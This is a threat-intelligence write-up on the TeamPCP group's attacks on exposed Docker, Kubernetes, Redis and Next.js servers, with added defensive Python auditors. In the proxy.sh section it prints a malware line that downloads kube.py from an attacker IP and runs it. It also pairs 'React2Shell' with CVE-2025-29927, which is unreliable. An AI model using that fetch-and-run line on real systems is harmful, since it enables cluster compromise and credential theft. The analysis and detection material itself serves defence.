Threat Alert: Cloud‑Native Cybercrime Group TeamPCP Targets Docker, Kubernetes, and Redis

TeamPCP, a newly identified cloud‑native threat group, has compromised at least 60,000 servers worldwide by exploiting exposed Docker APIs, Kubernetes clusters, Redis instances, and the React2Shell vulnerability, employing automated tools such as proxy.sh, kube.py, and react.py, with detailed MITRE ATT&CK mapping and concrete defense recommendations.

Black & White Path

Overview

TeamPCP (also known as PCPcat, ShellForce, DeadCatx3) began large‑scale cloud‑native attacks in December 2025. The group systematically exploits exposed Docker APIs, Kubernetes clusters, Redis servers, unauthenticated Ray dashboards, and the React2Shell vulnerability (CVE‑2025‑29927) in Next.js applications. Researchers estimate at least 60 000 compromised servers, with 61 % on Azure and 36 % on AWS.

Technical Analysis

Attack Chain Reconstruction

The attack chain is fully automated from Internet scanning to persistence:

Initial Access – Unauthenticated Docker API access, exploitation of CVE‑2025‑29927, and scanning of mis‑configured Redis servers provide footholds.

Persistence – Malicious containers are deployed, systemd services are created, and privileged DaemonSets are installed to maintain control inside Kubernetes clusters.

Data Exfiltration – Custom scripts harvest environment variables, Git credentials, SSH keys, and cloud provider tokens, sending them over encrypted channels.

Core Tool Analysis

proxy.sh – Operational Backbone

proxy.sh orchestrates infrastructure deployment and scaling. Its functions include installing proxy/tunnel tools, deploying additional scanners, registering system services for persistence, and delivering Kubernetes‑specific payloads. When run inside a Kubernetes pod it detects the environment and downloads kube.py:

# A projected service-account token exists only inside a Kubernetes pod
if [ -f /var/run/secrets/kubernetes.io/serviceaccount/token ]; then
    # Pull the cluster-penetration stage and run it
    curl -fsSL "http://44.252.85.168:666/files/kube.py" -o /tmp/k8s.py 2>/dev/null
    python3 /tmp/k8s.py
fi

Kubernetes environment detection code

kube.py – Cluster Penetration Tool

Cluster Credential Harvesting: Reads service‑account tokens and configuration data.

Automated Lateral Movement: Enumerates namespaces and pods via the Kubernetes API and executes malicious commands in each container.

DaemonSet Backdoor Deployment: Installs privileged containers on every node, mounting the host filesystem for persistent control.
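A defensive counterpart, added here as an example and not taken from the advisory or from any TeamPCP tooling: a Python audit over the JSON that `kubectl get daemonsets -A -o json` returns, flagging the privileged, host‑mounting DaemonSet pattern described above. It also covers the later detection items "Identify unfamiliar DaemonSets or Jobs" and "Watch for privileged containers and dangerous mounts". The two manifests embedded in it are constructed, and the list of sensitive host paths is this example's own assumption.

```python
"""Audit DaemonSet manifests for the privileged, host-mounting backdoor pattern.

Added example; it is neither the advisory's code nor any TeamPCP tooling.
Input is the JSON that `kubectl get daemonsets -A -o json` prints. The sample
below is constructed: one ordinary log agent and one rogue DaemonSet that runs
privileged, shares host namespaces and mounts the node's root filesystem.
"""
import json

# Constructed sample in the shape of a Kubernetes List object; all values invented.
SAMPLE_DAEMONSETS = json.dumps({
    "kind": "List",
    "items": [
        {
            "metadata": {"name": "log-agent", "namespace": "logging"},
            "spec": {"template": {"spec": {
                "containers": [{
                    "name": "agent",
                    "image": "registry.example.internal/log-agent:1.4",
                    "securityContext": {"privileged": False},
                    "volumeMounts": [{"name": "varlog", "mountPath": "/var/log", "readOnly": True}],
                }],
                "volumes": [{"name": "varlog", "hostPath": {"path": "/var/log"}}],
            }}},
        },
        {
            "metadata": {"name": "kube-proxy-cache", "namespace": "kube-system"},
            "spec": {"template": {"spec": {
                "hostPID": True,
                "hostNetwork": True,
                "containers": [{
                    "name": "c",
                    "image": "docker.io/library/alpine:latest",
                    "securityContext": {"privileged": True},
                    "volumeMounts": [{"name": "host", "mountPath": "/host"}],
                }],
                "volumes": [{"name": "host", "hostPath": {"path": "/"}}],
            }}},
        },
    ],
})

# Assumption of this example: host paths that hand a container control of the node.
SENSITIVE_HOST_PATHS = {
    "/", "/etc", "/root", "/var/lib/kubelet",
    "/var/run/docker.sock", "/run/containerd/containerd.sock",
}


def _host_path_volumes(pod_spec):
    """Map volume name -> host path for every hostPath volume in a pod spec."""
    return {v["name"]: v["hostPath"]["path"]
            for v in pod_spec.get("volumes", []) if "hostPath" in v}


def audit_daemonsets(list_json):
    """Return [(namespace/name, [reasons])] for DaemonSets that look like node backdoors.

    A DaemonSet is reported when it shares the host PID or network namespace,
    runs a privileged container, or mounts one of SENSITIVE_HOST_PATHS.
    """
    findings = []
    for item in json.loads(list_json)["items"]:
        meta = item["metadata"]
        pod = item["spec"]["template"]["spec"]
        reasons = []
        if pod.get("hostPID"):
            reasons.append("hostPID shared")
        if pod.get("hostNetwork"):
            reasons.append("hostNetwork shared")
        host_paths = _host_path_volumes(pod)
        for c in pod.get("containers", []) + pod.get("initContainers", []):
            if c.get("securityContext", {}).get("privileged"):
                reasons.append(f"privileged container {c['name']}")
            for m in c.get("volumeMounts", []):
                path = host_paths.get(m["name"])
                if path is None:
                    continue
                norm = path if path == "/" else path.rstrip("/")
                if norm in SENSITIVE_HOST_PATHS:
                    reasons.append(f"{c['name']} mounts host path {path} at {m['mountPath']}")
        if reasons:
            findings.append((f"{meta['namespace']}/{meta['name']}", reasons))
    return findings


if __name__ == "__main__":
    for name, reasons in audit_daemonsets(SAMPLE_DAEMONSETS):
        print(f"{name}: {'; '.join(reasons)}")
```

The legitimate log agent mounts only /var/log read‑only and is not reported; the rogue DaemonSet trips every check. Running the same function on `kubectl get pods -A -o json` (the pod spec lives at `.spec` instead of `.spec.template.spec`) catches the same pattern in Jobs and ad‑hoc pods.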

react.py – React2Shell Exploit Tool

Automates exploitation of CVE‑2025‑29927 in vulnerable Next.js applications. Workflow:

Fetch target domain list from a central API.

Craft a multipart request that triggers the vulnerability.

Execute system commands to collect .env files, cloud credentials, Git configs, and SSH keys.

Deploy persistent backdoors through multiple mechanisms.

Malware Modules

Scanner Module (pcpcat.py): Performs large‑scale scans for exposed Docker APIs and Ray dashboards, then automatically deploys malicious containers.

Cryptocurrency Mining Module: Uses compromised servers for Monero mining, hiding the miner with double base64 encoding and zip compression.

Tunnel Proxy Module: Deploys open‑source tools such as FRPS and gost to build a distributed proxy network for further attacks or rental.

Victim Analysis

At least 60 000 servers have been compromised. Cloud‑provider distribution: Azure 61 %, AWS 36 %, GCP 2 %, others <1 %.

Data leaks comprise 27 GB across 17 TeamPCP dumps, 13 ShellForce dumps, and 19 ZIP archives, containing personal identifiers, resumes, and credential files.

MITRE ATT&CK Mapping

Initial Access: T1190 (Public‑Facing Application) via React2Shell; T1133 (External Remote Services) via unauthenticated Docker, Kubernetes, Redis, Ray APIs.

Execution: T1059 (Command‑Shell) and T1609 (Container Commands).

Persistence: T1053.003 (Cron), T1525 (Image Implant), T1610 (Container Deployment), T1611 (Host Escape).

Privilege Escalation: T1068 (Privilege Escalation) and T1611 (Host Escape).

Credential Access: T1552.001 (Credentials in Files) and T1528 (Application Access Token).

Command & Control: T1090 (Proxy) and T1573 (Encrypted Channel).

Impact: T1496 (Resource Hijacking) via XMRig mining and T1486 (Data Encrypted for Impact) via ransomware.

Defense Recommendations

Prevention

Disable public exposure of Docker APIs.

Enforce strong authentication and authorization for Kubernetes APIs.

Close unused management interfaces.

Implement network segmentation to restrict control‑plane access.
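The first two items above come down to how the Docker daemon is configured. The following Python check, added here as an example and not part of the advisory, audits a daemon.json for the exposure TeamPCP's scanner looks for: an Engine API TCP listener with no client authentication. The keys "hosts", "tlsverify", "tlscacert", "tlscert" and "tlskey" are real dockerd options; the weak and hardened configurations and the internal address 10.20.0.5 are constructed.

```python
"""Check a dockerd daemon.json for an unauthenticated TCP listener.

Added example, not from the advisory. "hosts", "tlsverify", "tlscacert",
"tlscert" and "tlskey" are real dockerd configuration keys; the two sample
configurations are constructed. The weak one is the exposure the advisory
describes: the Engine API reachable from the network with no authentication.
"""
import json

# Constructed: API bound to every interface on the plain-text port, no TLS.
WEAK_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'

# Constructed: bound to one internal address (assumed 10.20.0.5) with mutual TLS.
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.20.0.5:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})

# Bind addresses that expose the listener on every network interface.
ALL_INTERFACES = {"", "0.0.0.0", "[::]", "::"}


def audit_daemon_config(text):
    """Return a list of findings for the TCP listeners declared in a daemon.json document."""
    cfg = json.loads(text)
    findings = []
    for host in cfg.get("hosts", []):
        if not host.startswith("tcp://"):
            continue  # unix:// and fd:// listeners are gated by file permissions
        bind = host[len("tcp://"):].rsplit(":", 1)[0]
        if bind in ALL_INTERFACES:
            findings.append(f"{host}: bound to all interfaces")
        if not cfg.get("tlsverify"):
            findings.append(f"{host}: TCP listener without tlsverify, API is unauthenticated")
        elif not all(cfg.get(k) for k in ("tlscacert", "tlscert", "tlskey")):
            findings.append(f"{host}: tlsverify set but CA/cert/key paths incomplete")
    return findings


if __name__ == "__main__":
    for label, doc in (("weak", WEAK_DAEMON_JSON), ("hardened", HARDENED_DAEMON_JSON)):
        print(label, audit_daemon_config(doc) or ["no findings"])
```

The same `hosts` setting can also come from the `-H` flag in the systemd unit or from `DOCKER_HOST` overrides, so check the effective listener with `ss -ltnp` on the host as well; and even a TLS‑protected listener should sit behind a security group or firewall rule that limits it to the management subnet.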

Shift‑Left CI/CD Security

Scan container images during build and remove secrets.

Audit IaC configurations to avoid key leakage.

Apply least‑privilege principles to service accounts.

Avoid bundling .env files or SSH keys into images.
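One concrete build‑time check for the last two items, added here as an example and not part of the advisory: a Python scanner that reads a Dockerfile and its .dockerignore and reports the places where .env files, SSH keys or secret‑named environment variables would end up in an image layer or in the image config. The Dockerfile, .dockerignore and the secret name patterns are constructed for illustration, and the parser handles the shell form of COPY/ADD only.

```python
"""Scan a Dockerfile and .dockerignore for secrets being baked into an image.

Added example, not from the advisory. The Dockerfile, .dockerignore and the
secret name patterns below are constructed for illustration.
"""
import fnmatch
import re

# Constructed: a typical Node build that copies the whole context plus two
# explicit secret files and sets a cloud key in the image config.
SAMPLE_DOCKERFILE = """\
FROM node:20-alpine
WORKDIR /app
COPY package.json package-lock.json ./
RUN npm ci --omit=dev
COPY . .
COPY .env /app/.env
ADD ./.ssh/id_rsa /root/.ssh/id_rsa
ENV AWS_SECRET_ACCESS_KEY=CONSTRUCTED-PLACEHOLDER
CMD ["node", "server.js"]
"""

SAMPLE_DOCKERIGNORE = """\
node_modules
.git
"""

# File name patterns that should never enter an image layer (assumption of this example).
SECRET_FILE_PATTERNS = [".env", ".env.*", "*.pem", "*.key", "id_rsa*", "id_ed25519*",
                        ".git", ".npmrc", ".aws", ".kube", ".docker"]
SECRET_ENV_KEY = re.compile(r"(SECRET|PASSWORD|PASSWD|TOKEN|PRIVATE_KEY|ACCESS_KEY|API_KEY)", re.I)


def _basename(path):
    return path.rstrip("/").rsplit("/", 1)[-1]


def scan_dockerfile(dockerfile, dockerignore=""):
    """Return [(line_no, instruction, reason)] for lines that would bake secrets into the image.

    Shell-form COPY/ADD/ENV only; the JSON form (COPY ["a", "b"]) is not parsed.
    """
    ignored = {l.strip() for l in dockerignore.splitlines() if l.strip() and not l.startswith("#")}
    uncovered = [p for p in SECRET_FILE_PATTERNS if p not in ignored]
    findings = []
    for n, raw in enumerate(dockerfile.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        instr, args = parts[0].upper(), [a for a in parts[1:] if not a.startswith("--")]
        if instr in ("COPY", "ADD") and len(args) >= 2:
            for src in args[:-1]:
                if src in (".", "./") and uncovered:
                    findings.append((n, instr, "copies whole build context; .dockerignore lacks "
                                     + ", ".join(uncovered)))
                elif any(fnmatch.fnmatch(_basename(src), p) for p in SECRET_FILE_PATTERNS):
                    findings.append((n, instr, f"copies secret-looking file {src} into the image"))
        elif instr == "ENV" and args:
            key = args[0].split("=", 1)[0]
            if SECRET_ENV_KEY.search(key):
                findings.append((n, instr, f"{key} is stored in the image config, readable with docker inspect"))
    return findings


if __name__ == "__main__":
    for n, instr, reason in scan_dockerfile(SAMPLE_DOCKERFILE, SAMPLE_DOCKERIGNORE):
        print(f"line {n} {instr}: {reason}")
```

A wholesale `COPY . .` is only safe when the .dockerignore excludes every secret pattern, which is why the check compares the two files rather than the Dockerfile alone; secrets a build genuinely needs belong in `RUN --mount=type=secret` or in the runtime environment, never in a layer or in ENV.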

Runtime Monitoring

Deploy container security solutions to detect anomalous behavior.

Watch for privileged containers and dangerous mounts.

Monitor outbound traffic for data exfiltration signs.

Track characteristics of cryptocurrency miners.

Detection Strategies

Control‑Plane Monitoring

Detect unauthorized new containers.

Identify unfamiliar DaemonSets or Jobs.

Alert on Ray job submissions from unknown IPs.

Watch Redis for dangerous commands like CONFIG or SLAVEOF.
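For the Redis item, one way to turn "dangerous commands" into a detection, added here as an example and not part of the advisory: a Python parser for the text that Redis prints under MONITOR, flagging CONFIG changes that move the RDB persistence target, SLAVEOF/REPLICAOF pointing the instance at another master, MODULE LOAD, and any command arriving from outside an allowed client network. The captured lines and the trusted network 10.20.0.0/16 are constructed.

```python
"""Flag Redis abuse patterns in MONITOR output (added example, not the advisory's code).

Assumes the line format Redis prints for MONITOR:
    <unix time> [<db> <client ip:port>] "CMD" "arg" ...
The sample lines and the trusted client network (10.20.0.0/16) are constructed.
"""
import ipaddress
import re
import shlex

# Assumption: only the application subnet should ever talk to this Redis.
TRUSTED_CLIENT_NETS = [ipaddress.ip_network("10.20.0.0/16")]

_LINE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>\S+)\] (?P<args>.*)$')

# Constructed MONITOR capture: two normal app commands, three from an outside
# address that redirect persistence and replication, then two benign admin commands.
SAMPLE_MONITOR = """\
1765800000.101 [0 10.20.4.7:51234] "GET" "session:abc"
1765800000.204 [0 10.20.4.7:51234] "SET" "session:abc" "{\\"uid\\":42}" "EX" "3600"
1765800001.330 [0 203.0.113.9:40110] "CONFIG" "SET" "dir" "/tmp"
1765800001.331 [0 203.0.113.9:40110] "CONFIG" "SET" "dbfilename" "dump.rdb"
1765800002.010 [0 203.0.113.9:40110] "SLAVEOF" "198.51.100.5" "6379"
1765800003.500 [0 10.20.4.9:51300] "CONFIG" "GET" "maxmemory"
1765800004.000 [0 10.20.4.9:51300] "REPLICAOF" "NO" "ONE"
"""


def parse_monitor_line(line):
    """Parse one MONITOR line into a dict, or return None for non-matching lines."""
    m = _LINE.match(line)
    if not m:
        return None
    args = shlex.split(m.group("args"))   # MONITOR double-quotes every argument
    if not args:
        return None
    client = m.group("client")
    # "lua" and unix-socket clients carry no IP address.
    ip = client.rsplit(":", 1)[0] if ":" in client else None
    return {"ts": float(m.group("ts")), "client": client, "ip": ip,
            "cmd": args[0].upper(), "args": args[1:]}


def _is_trusted(ip):
    try:
        addr = ipaddress.ip_address(ip)
    except (TypeError, ValueError):
        return False
    return any(addr in net for net in TRUSTED_CLIENT_NETS)


def classify(event):
    """Return the list of reasons an event is suspicious (empty for normal traffic)."""
    cmd, up = event["cmd"], [a.upper() for a in event["args"]]
    reasons = []
    if cmd == "CONFIG" and up[:1] == ["SET"] and up[1:2] and up[1] in ("DIR", "DBFILENAME"):
        reasons.append(f"CONFIG SET {up[1]}: RDB persistence target changed")
    elif cmd == "CONFIG" and up[:1] != ["GET"]:
        reasons.append(f"CONFIG {up[0] if up else ''}: runtime configuration changed")
    if cmd in ("SLAVEOF", "REPLICAOF") and up[:2] != ["NO", "ONE"]:
        reasons.append(f"{cmd}: instance re-pointed at master {' '.join(event['args'])}")
    if cmd == "MODULE" and up[:1] == ["LOAD"]:
        reasons.append("MODULE LOAD: native code loaded into the server")
    if not _is_trusted(event["ip"]):
        reasons.append(f"client {event['client']} is outside the trusted networks")
    return reasons


def detect(monitor_text):
    """Run classify() over a MONITOR capture; returns [(line_no, cmd, reasons)]."""
    hits = []
    for n, line in enumerate(monitor_text.splitlines(), 1):
        ev = parse_monitor_line(line)
        if ev is None:
            continue
        reasons = classify(ev)
        if reasons:
            hits.append((n, ev["cmd"], reasons))
    return hits


if __name__ == "__main__":
    for n, cmd, reasons in detect(SAMPLE_MONITOR):
        print(f"line {n} {cmd}: {'; '.join(reasons)}")
```

MONITOR is costly on a busy instance, so in production the same rules are better fed from a proxy or from the Redis ACL log; and the detection is a complement to, not a substitute for, `protected-mode yes`, `requirepass`/ACLs and renaming or disabling CONFIG on any instance that does not need it.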

Network and Endpoint Detection

Flag unusual GitHub download activity.

Identify traffic from tools such as Tor, FRPS, gost, or Sliver.

Monitor processes with abnormally high CPU usage.

Detect large‑scale internal network scans.

When a single container shows signs of compromise, expand the investigation to the entire cluster, as TeamPCP rarely limits itself to one pod.

Response and Recovery

Assume the whole cloud environment is compromised and take immediate actions:

Block all outbound connections from affected servers.

Isolate the impacted subnet.

Disable external access to all management APIs.

Remove Persistence

Delete unknown containers and images.

Remove rogue DaemonSets.

Delete malicious systemd services.

Rotate all cloud provider credentials.

Rebuild Infrastructure

Redeploy nodes with clean images.

Recreate Kubernetes clusters from scratch.

Use IaC templates for application deployment.

Ensure the new environment contains no legacy configurations.

Post‑Incident Audit

Audit all exposed APIs and services.

Rotate all cloud credentials and keys.

Review CI/CD pipeline security.

Deploy continuous runtime monitoring.

Tags: Docker, Kubernetes, incident response, cloud security, malware analysis, Threat Intelligence, MITRE ATT&CK

Written by

Black & White Path

We are the beacon of the cyber world, a stepping stone on the road to security.
